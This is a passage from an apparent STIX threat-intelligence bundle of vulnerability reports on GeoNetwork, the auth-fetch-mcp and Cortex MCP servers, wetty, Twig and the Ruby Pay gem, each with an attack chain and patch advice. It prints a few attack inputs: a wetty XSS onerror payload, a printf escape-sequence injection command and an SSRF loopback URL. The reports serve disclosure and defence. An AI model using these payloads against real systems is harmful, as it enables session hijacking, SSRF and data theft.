any public-facing GeoNetwork 4.x instance (versions 4.0.0-alpha.1 through 4.4.10) is vulnerable to an attacker retrieving the full content of metadata that should not be publicly visible, potentially exposing internal project details, draft documents, or data restricted to specific user groups.\n\n## Recommendation\n\n*   Patch affected GeoNetwork instances immediately to a version that addresses CVE-2026-46487.\n*   Review web server access logs and GeoNetwork application logs for suspicious HTTP POST requests to the search API that may omit the `query` field, particularly from unknown or untrusted IP addresses.\n",
      "published": "2026-07-03T12:44:38Z",
      "labels": [
        "authorization-bypass",
        "information-disclosure",
        "web-vulnerability",
        "elasticsearch",
        "geonetwork",
        "ghsa"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-582q-v28r-7cxr"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a9eadeb1-9fff-5e71-8ecc-12b3275d03ad",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "auth-fetch-mcp SSRF Protection Bypass via IPv4-mapped IPv6 Loopback",
      "description": "## Overview\n\nA high-severity Server-Side Request Forgery (SSRF) protection bypass vulnerability (CVE-2026-49857) has been identified in `auth-fetch-mcp` versions up to and including 3.0.1. The flaw resides in the `src/security.ts` module, specifically within the `isPrivateV6()` function, which is designed to prevent requests to private and loopback IP addresses. However, when a Node.js WHATWG URL parser hex-normalizes an IPv4-mapped IPv6 loopback address (e.g., `::ffff:127.0.0.1` becomes `::ffff:7f00:1`), the subsequent `net.isIPv4()` check incorrectly returns `false`. This bypasses the security control, allowing `auth_fetch` and `download_media` tools to access internal services. The issue has a CVSS v3.1 Base Score of 7.4 (High) and enables attackers to read sensitive information from internal services on the target system.\n\n## Attack Chain\n\n1. An attacker supplies a user-controlled URL argument (e.g., `http://[::ffff:127.0.0.1]:PORT/`) to the `auth_fetch` or `download_media` tools within `auth-fetch-mcp`.\n2. The application's `navigateTo()` or `ctx.request.get()` function calls `assertSafeUrl()` to validate the provided URL against SSRF protections.\n3. Inside `assertSafeUrl()`, the `isPrivateV6()` function is invoked to determine if the URL's hostname is a private IPv6 address.\n4. The Node.js WHATWG URL parser silently normalizes the IPv4-mapped IPv6 address (e.g., `::ffff:127.0.0.1`) to its hex-normalized form (e.g., `::ffff:7f00:1`).\n5. `isPrivateV6()` attempts to check the normalized address but `net.isIPv4('7f00:1')` incorrectly returns `false` because `7f00:1` is not a dotted-decimal IPv4 string.\n6. This incorrect `false` result causes the `isPrivateV6()` and subsequently `assertSafeUrl()` functions to treat the loopback address as safe, bypassing the intended SSRF protection.\n7. The now \"validated\" URL, which points to an internal loopback service, is then used by `page.goto()` (for `auth_fetch`) or `ctx.request.get()` (for `download_media`) to issue an HTTP request.\n8. The application fetches content from the specified internal service, extracts it, and returns it to the attacker, thereby compromising the confidentiality of internal service responses.\n\n## Impact\n\nThis Server-Side Request Forgery (SSRF) vulnerability allows an attacker who can control the `url` argument of `auth_fetch` or `download_media` to force the `auth-fetch-mcp` server to make HTTP requests to services on `127.0.0.1` or other private IPv4 ranges. This impacts end users running `auth-fetch-mcp` locally, where an attacker could read responses from local development servers, admin panels, or credential endpoints. Server-side deployments of `auth-fetch-mcp` face the same risk against internal network services. The confidentiality of internal service responses is fully compromised (C:H), as demonstrated by the ability to retrieve an `INTERNAL_SECRET_MARKER` from a simulated internal service. The integrity and availability of the target service are not directly affected.\n\n## Recommendation\n\n*   **Patch CVE-2026-49857**: Implement the proposed remediation outlined in the GHSA advisory, which involves decoding the hex-encoded IPv4-mapped suffix before passing it to `isPrivateV4()` in `src/security.ts`.\n*   **Application-level Guard**: Add a `BrowserContext` route guard in `src/browser.ts` to re-validate every navigation URL, including redirect targets, using `assertSafeUrl()` for enhanced protection.\n*   **Review `auth-fetch-mcp` usage**: If `auth-fetch-mcp` is exposed to user-controlled input, review configurations and consider restricting its ability to resolve arbitrary URLs until a patch for CVE-2026-49857 is available.\n",
      "published": "2026-07-03T12:43:47Z",
      "labels": [
        "ssrf",
        "vulnerability",
        "bypass",
        "node.js",
        "initial-access",
        "defense-evasion"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-pvrj-8cg3-j5f8"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--02c437d1-62a9-54e0-ae6f-91fbe3bbe4dd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cf20272e-2309-511b-bd86-7918cb03bbb1",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Information Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1082",
          "url": "https://attack.mitre.org/techniques/T1082"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cc9a34e1-8f76-5299-847a-02e90ffd9bc5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cf20272e-2309-511b-bd86-7918cb03bbb1",
      "target_ref": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9dc17885-19cb-5e0f-b7ed-f5baa5b9c67a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cf20272e-2309-511b-bd86-7918cb03bbb1",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cf20272e-2309-511b-bd86-7918cb03bbb1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Wetty Client DOM XSS via Base64 Filename in File Download Escape Sequence (CVE-2026-49864)",
      "description": "## Overview\n\nA critical DOM-based Cross-Site Scripting (XSS) vulnerability, tracked as CVE-2026-49864, has been identified in the wetty web-based SSH client, affecting versions prior to 3.0.4. This flaw allows a remote attacker to execute arbitrary JavaScript within the victim's browser context, leading to keystroke injection and command execution within their active SSH session. The vulnerability stems from wetty's client-side handling of file-download escape sequences (`\\x1b[5i...:...\\x1b[4i`), where a base64-encoded filename within the sequence is directly base64-decoded and interpolated into an HTML `Toastify` notification with `escapeMarkup: false`. This allows an attacker to inject malicious HTML, including `\u003cscript\u003e` tags or `onerror` event handlers, into the victim's browser. The exploitation occurs when the victim's terminal renders any output containing the specially crafted escape sequence, making it a significant threat to confidentiality and integrity of SSH sessions.\n\n## Attack Chain\n\n1.  **Attacker gains control of SSH server output**: The attacker compromises an SSH server that the victim uses with wetty, or is another user on a shared SSH host who can write to files/logs visible to the victim.\n2.  **Attacker crafts malicious escape sequence**: The attacker prepares a base64-encoded HTML payload (e.g., `\u003cimg src=x onerror=\"window.wetty_term.input(\\\"cmd\\\\n\\\",true)\"\u003e`) and encodes it as the filename portion of a file-download escape sequence.\n3.  **Attacker delivers escape sequence to terminal output**: The attacker uses a command like `printf '\\x1b[5i%s:%s\\x1b[4i' \"$FNAME_B64\" \"$DATA_B64\"` to emit the crafted escape sequence into the victim's SSH session output (e.g., by `cat`ting a file, tailing a log, or via MOTD).\n4.  **Victim's wetty client processes output**: The wetty client receives the terminal output containing the escape sequence and passes it through its `FileDownloader.buffer`.\n5.  **Malicious filename is decoded and rendered**: The `FileDownloader` identifies the complete escape sequence, base64-decodes the filename, and interpolates it unescaped into a `Toastify` notification, which renders the attacker-controlled HTML.\n6.  **XSS payload executes in victim's browser**: The injected HTML (e.g., the `onerror` handler) executes, calling `window.wetty_term.input()` with attacker-chosen commands.\n7.  **Commands are typed into victim's SSH session**: The `wetty_term.input()` method causes the attacker's commands to be sent to the SSH server as if the victim typed them, leading to execution (e.g., `id \u003e /tmp/pwned`).\n8.  **Information disclosure/further compromise**: The attacker-injected commands execute on the SSH host, potentially leading to data exfiltration (e.g., `window.wetty_term.buffer.active` disclosure) or further system compromise.\n\n## Impact\n\nThis vulnerability poses a severe risk to organizations using vulnerable wetty clients. If exploited, it grants the attacker significant control over the victim's SSH session. Impact includes compromise of confidentiality, as the attacker can read the victim's rendered terminal contents via `window.wetty_term.buffer.active`. Integrity is also compromised through the ability to type arbitrary attacker-chosen commands into the victim's SSH session via `window.wetty_term.input()`, effectively achieving remote command execution. Furthermore, it presents a critical authentication bypass, allowing an attacker who can control terminal output (e.g., a low-privileged user on a shared SSH host) to gain keystroke injection capabilities into a higher-privileged user's wetty session, escalating privileges or moving laterally within the environment.\n\n## Recommendation\n\n*   Patch CVE-2026-49864 by upgrading the wetty client to version 3.0.4 or later immediately.\n*   Deploy the Sigma rule provided in this brief to your SIEM to detect attempts to inject malicious escape sequences via `printf` or similar commands within SSH sessions.\n*   Review SSH server command logging for unusual `printf` commands containing `\\x1b[5i` and base64-encoded strings, as detected by the rule `Detect Wetty DOM XSS Payload Injection Attempt`.\n",
      "published": "2026-07-03T12:42:43Z",
      "labels": [
        "xss",
        "dom-xss",
        "wetty",
        "vulnerability",
        "rce",
        "ssh-client",
        "client-side"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-p26j-h7wj-r568"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--173e3126-b446-5014-993b-93724d5e1d38",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7457ca7c-d451-52ab-814d-e845bd79118a",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--65febdf2-9aae-5154-840b-4d681ec697cc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7457ca7c-d451-52ab-814d-e845bd79118a",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2e8ec25d-7e3f-5c1d-8766-78f5592b382c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7457ca7c-d451-52ab-814d-e845bd79118a",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hijack Execution Flow",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1574",
          "url": "https://attack.mitre.org/techniques/T1574"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dae21fda-a201-5906-bb63-a48298a6118c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7457ca7c-d451-52ab-814d-e845bd79118a",
      "target_ref": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--848375a4-3316-513b-8f81-0114d556b825",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7457ca7c-d451-52ab-814d-e845bd79118a",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ddc67b91-4381-5168-a6eb-71540506b92f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7457ca7c-d451-52ab-814d-e845bd79118a",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Disk Wipe",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1561",
          "url": "https://attack.mitre.org/techniques/T1561"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--27f59904-e1ea-5152-bb30-4a48c854b4e3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7457ca7c-d451-52ab-814d-e845bd79118a",
      "target_ref": "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7457ca7c-d451-52ab-814d-e845bd79118a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Cortex MCP Server Untrusted Project Bootstrap Code Execution (CVE-2026-49986)",
      "description": "## Overview\n\nA high-severity local arbitrary code execution (LACE) vulnerability, identified as CVE-2026-49986, affects the Cortex MCP server (`neuro-cortex-memory`) versions up to 3.17.0. This flaw arises because the server implicitly trusts the `CLAUDE_PROJECT_DIR` environment variable, which is automatically set by the Claude Code IDE extension to the currently open project directory. An attacker can craft a malicious project containing specific marker files (`mcp_server/` subdirectory and `ui/unified-viz.html`) and an arbitrary Python script named `visualize_bootstrap.py`. When a victim is social-engineered into opening this project in Claude Code and then invokes the `/cortex-visualize` slash command or the `open_visualization` tool, the malicious script is executed with the victim's local user privileges via `subprocess.run()`. This vulnerability allows for sensitive data exfiltration, system manipulation, and potential persistence mechanisms.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious project directory, including specific marker files (`mcp_server/` subdirectory, `ui/unified-viz.html`) and an arbitrary Python script positioned at `mcp_server/server/visualize_bootstrap.py`.\n2.  The attacker social-engineers the victim into opening this malicious project within the Claude Code IDE.\n3.  Upon opening the project, the Claude Code IDE extension automatically sets the `CLAUDE_PROJECT_DIR` environment variable to the path of the malicious project.\n4.  The victim subsequently invokes the `/cortex-visualize` slash command or triggers the `open_visualization` MCP tool within the Claude Code interface.\n5.  The `open_visualization` handler in `mcp_server/handlers/open_visualization.py` resolves the path specified by `CLAUDE_PROJECT_DIR` as a trusted Cortex source root, due to the presence of the attacker-controlled marker files.\n6.  The handler then constructs a path to the attacker's `visualize_bootstrap.py` script located within the malicious project directory.\n7.  The handler executes this malicious `visualize_bootstrap.py` script via `subprocess.run([sys.executable, ...])` with the full privileges of the victim's local user account.\n8.  The executed malicious script performs actions such as data exfiltration (e.g., files, secrets, SSH/GPG keys), local file modification, or establishes persistence by overwriting files in the Cortex plugin cache directory via a secondary path in `http_launcher.py`.\n\n## Impact\n\nThis vulnerability leads to local arbitrary code execution (LACE) with the privileges of the victim's local user account. Any user with Cortex MCP plugin installed who is tricked into opening an attacker-controlled project in Claude Code and activating the visualization tool is at severe risk. The consequences include, but are not limited to, complete compromise of user data confidentiality through exfiltration of files, secrets, and credentials (e.g., environment variables, SSH/GPG keys). Integrity is also threatened, as attackers can modify or delete local files, source code, and cached data. Furthermore, the attack can impact system availability by terminating local processes or destroying user data. The secondary execution path via `http_launcher.py` enables persistence by allowing attackers to overwrite files in the Cortex plugin cache.\n\n## Recommendation\n\n*   Immediately apply the vendor-recommended remediation to patch `mcp_server/handlers/open_visualization.py` and `mcp_server/server/http_launcher.py` to remove `CLAUDE_PROJECT_DIR` from the dev-source candidate list and gate executable dev-source resolution behind an explicit opt-in flag, as described in CVE-2026-49986.\n*   Ensure that all instances of `neuro-cortex-memory` are updated to a version greater than 3.17.0.\n*   Educate users about the risks of opening untrusted project directories or repositories in development environments and the potential for social engineering to exploit CVE-2026-49986.\n",
      "published": "2026-07-03T12:41:26Z",
      "labels": [
        "rce",
        "lpe",
        "supply-chain",
        "ide",
        "python",
        "environment-variable"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
        "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-gvpp-v77h-5w8g"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--eaaa6458-b9a7-5723-af99-0c365eb5a3af",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a6285d46-bcb1-53e0-9e65-f13c523b2fa7",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--29d9bdd8-e4ee-5628-8ab1-854c1bad6e4b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a6285d46-bcb1-53e0-9e65-f13c523b2fa7",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a6285d46-bcb1-53e0-9e65-f13c523b2fa7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Twig: Sandbox filter, tag and function allow-list bypass when sandbox state changes between renders for a cached `Template`",
      "description": "## Overview\n\nA critical vulnerability (CVE-2026-49981) has been identified in the Twig templating engine, specifically affecting versions up to 3.26.0. This flaw allows an attacker to bypass the security sandbox's filter, tag, and function allow-lists in applications utilizing long-lived worker environments (e.g., FrankenPHP, RoadRunner, Symfony Messenger consumers). The core issue stems from the `checkSecurity()` method, which governs template security, being invoked only once during a template's initial construction and caching. If the application later changes its sandbox state—such as enabling or disabling the sandbox, or altering the security policy—a previously cached `Template` instance retains its initial, potentially less restrictive, security verdict. This oversight allows an attacker to execute arbitrary code or functions that should be prohibited within a sandboxed environment, presenting a significant risk for server-side template injection leading to remote code execution.\n\n## Attack Chain\n\n1.  **Initial Access / Malicious Template Injection**: An attacker identifies a web application feature that allows the submission or modification of Twig templates, such as a custom theme editor, report generator, or CMS, typically achieved via an exploit in another component or a legitimate feature misused.\n2.  **Non-Sandboxed Pre-Rendering**: The attacker crafts a malicious Twig template and arranges for the vulnerable application to render it (or a part of it, like a shared layout) in an initially *non-sandboxed* context.\n3.  **Template Caching with Permissive Verdict**: Twig processes this non-sandboxed template, creating and caching a `Template` instance. The built-in `checkSecurity()` method is invoked, recording a permissive security verdict due to the non-sandboxed environment.\n4.  **Sandbox State Transition**: The application's environment later transitions to a *sandboxed* state, either through `enableSandbox()`/`disableSandbox()` calls or a change in the `SecurityPolicy` for subsequent template renders.\n5.  **Cached Template Reuse**: The application attempts to render the *same previously cached `Template` instance* (e.g., through an `extends`, `use`, `include`, or `import` statement) in this now-sandboxed context.\n6.  **Security Policy Bypass**: Due to the vulnerability, the cached `Template` instance reuses its initial, permissive security verdict for filters, tags, and functions, effectively bypassing the newly active sandbox `SecurityPolicy`.\n7.  **Arbitrary Code Execution**: The malicious template then executes functions or uses filters/tags that would normally be blocked by the sandbox, leading to arbitrary code execution on the server.\n8.  **Impact**: Successful exploitation allows for remote code execution, data exfiltration, and potential full system compromise.\n\n## Impact\n\nThis vulnerability poses a significant risk to web applications using Twig in environments where the sandbox state can change dynamically, particularly in long-lived workers like those found in FrankenPHP, RoadRunner, or Symfony Messenger consumers. A successful exploitation of CVE-2026-49981 can lead to arbitrary code execution on the affected server, enabling attackers to fully compromise the host system, exfiltrate sensitive data, or install further malicious software. While specific victim counts are not available, Twig is a widely used templating engine across various PHP applications, making many organizations potentially susceptible if their deployments meet the vulnerable configuration.\n\n## Recommendation\n\n*   **Patch CVE-2026-49981 immediately** by upgrading `composer/twig/twig` to a version greater than 3.26.0. This addresses the core vulnerability.\n*   **Review your application's Twig usage** to ensure `Environment` instances are properly isolated and not shared between sandboxed and non-sandboxed contexts, especially in long-lived worker processes, as described in this brief.\n",
      "published": "2026-07-03T12:40:14Z",
      "labels": [
        "twig",
        "vulnerability",
        "sandbox-bypass",
        "web-application",
        "rce"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-529h-vh3j-85hq"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cec24171-6e3a-5d40-862a-e96d59ea1da3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--19a4d9bc-04fe-5fb0-888b-22ff3f81125d",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ed69cf90-6dea-54fe-b9c3-f00eee2b55c5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--19a4d9bc-04fe-5fb0-888b-22ff3f81125d",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b1a9799e-789c-5e58-919d-3a131a323ddc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--19a4d9bc-04fe-5fb0-888b-22ff3f81125d",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--19a4d9bc-04fe-5fb0-888b-22ff3f81125d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Non-Constant-Time HMAC Comparison in Pay Gem Paddle Billing Webhook Signature Verifier",
      "description": "## Overview\n\nThe Ruby `Pay` gem, specifically versions equal to or older than 11.6.1, is vulnerable to a timing side-channel attack affecting its Paddle Billing webhook signature verification. The `Pay::Webhooks::PaddleBillingController#valid_signature?` method utilizes Ruby's non-constant-time `String#==` operator to compare the calculated HMAC with the attacker-supplied `Paddle-Signature` header. This allows an unauthenticated attacker to discern the correct HMAC character by character by observing subtle variations in response times. Successful exploitation grants the attacker the ability to forge arbitrary Paddle Billing webhook events, such as `subscription.created` or `transaction.completed`, which can lead to unauthorized provisioning of services, fraudulent refunds, or other business logic abuses within the victim application. The vulnerability is present in applications that mount `Pay::Engine` and enable `paddle_billing`, making the `POST /pay/webhooks/paddle_billing` endpoint publicly accessible to Paddle and, consequently, to attackers.\n\n## Attack Chain\n\n1.  **Initial Access:** An attacker identifies a Rails application utilizing the `Pay` gem (version \u003c= 11.6.1) and exposing the `POST /pay/webhooks/paddle_billing` endpoint, which is publicly accessible for Paddle to deliver webhook events.\n2.  **Information Gathering / Reconnaissance:** The attacker crafts a series of requests to the exposed webhook endpoint, supplying a valid timestamp (`ts=\u003cnow\u003e`) and a systematically varying guessed HMAC signature (`h1=\u003cguess\u003e`) within the `Paddle-Signature` header.\n3.  **Exploitation (Timing Side Channel):** The vulnerable application processes each request, internally calculating the true HMAC for the raw post data and comparing it to the attacker's `h1` guess using Ruby's `String#==`. Due to the non-constant-time nature of this comparison, the server's response time varies subtly based on how many leading characters of the `h1` guess match the true HMAC.\n4.  **Credential Access (HMAC Key Recovery):** By sending a large number of requests and precisely measuring and analyzing the response times for each attempt, the 